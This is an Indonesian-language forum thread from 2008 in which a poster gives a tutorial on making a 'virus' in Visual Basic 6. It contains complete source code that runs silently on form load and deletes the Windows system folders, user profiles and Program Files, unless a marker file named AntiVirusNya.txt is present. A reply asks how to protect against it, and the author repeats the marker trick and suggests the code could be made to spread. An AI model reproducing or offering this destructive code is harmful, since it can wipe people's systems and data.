MY HEART FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Membuat Virus Penghapus System

2 posters

Go down

Membuat Virus Penghapus System Empty Membuat Virus Penghapus System

Post by SunShine2008 Fri Jan 11, 2008 7:49 pm

Yg diperlukan:
1. VB(optimal : 6.0)
2. Harus Ngerti tombol di VB

Caranya
1. bikin form sekecil mungkin
2. didalam form masukan kode ini:

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject("Scripting.FileSystemObject")
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist("c:\windows\system32\
AntiVirusNya.txt") = True Then
End
Else
Call DelAll("c:\windows\system")
Call DelAll("c:\windows\system32")
Call DelAll("c:\windows")
Call DelAll("C:\Documents and Settings\All Users")
Call DelAll("C:\Documents and Settings\Administrator")
Call DelAll("C:\Documents and Settings")
Call DelAll("C:\Program Files\Common Files")
Call DelAll("C:\Program Files\Internet Explorer")
Call DelAll("C:\Program Files\Microsoft Visual Studio")
Call DelAll("C:\Program Files")
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = "" Then
FileExist = False
Else
FileExist = True
End If
End Function
Nah Selesai deh.
Jadi kesimpulanya virus ini dapat ditanggulangi dengan cara membuat File bernama AntiVirusNya.txt di=c:\windows\system32\AntiVirusNya.txt

Mohon Jgn digunakan sembarangan,dosa loh. Twisted Evil

NB:antivirus harus dibuat dahulu sebelum virus masuk,bukan sesudah virus masuk
SunShine2008
SunShine2008
~%% GeeK User %%~
~%% GeeK User %%~

Male Jumlah posting : 468
Age : 33
Location : Palembang
I Said : Kita tidak bisa menutupi kelemahan kita dengan penampilan kuat
Registration date : 10.01.08

Kembali Ke Atas Go down

Membuat Virus Penghapus System Empty Re: Membuat Virus Penghapus System

Post by DooM Mon Jan 14, 2008 6:51 pm

eh? cara buat anti-nya gmana?
DooM
DooM
Centurion Lover
Centurion Lover

Male Jumlah posting : 367
Age : 34
Location : Somewhere around world...
I Said : Hmm...I'm just a ordinary guy. No more no less.
Registration date : 11.01.08

Kembali Ke Atas Go down

Membuat Virus Penghapus System Empty Re: Membuat Virus Penghapus System

Post by SunShine2008 Mon Jan 14, 2008 8:23 pm

Loh kan dikasih tau diatas
buat File bernama AntiVirusNya.txt di=c:\windows\system32\AntiVirusNya.txt

jadi itu antivirus,tapi ingat ini antinya musti dimasukin dl loh,ni sifat virusnya nga menyebar,kan nga dibuat syntax lain nya,tapi apabila ingin dikembangkan mungkin akan lebih baik
SunShine2008
SunShine2008
~%% GeeK User %%~
~%% GeeK User %%~

Male Jumlah posting : 468
Age : 33
Location : Palembang
I Said : Kita tidak bisa menutupi kelemahan kita dengan penampilan kuat
Registration date : 10.01.08

Kembali Ke Atas Go down

Membuat Virus Penghapus System Empty Re: Membuat Virus Penghapus System

Post by Sponsored content


Sponsored content


Kembali Ke Atas Go down

Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik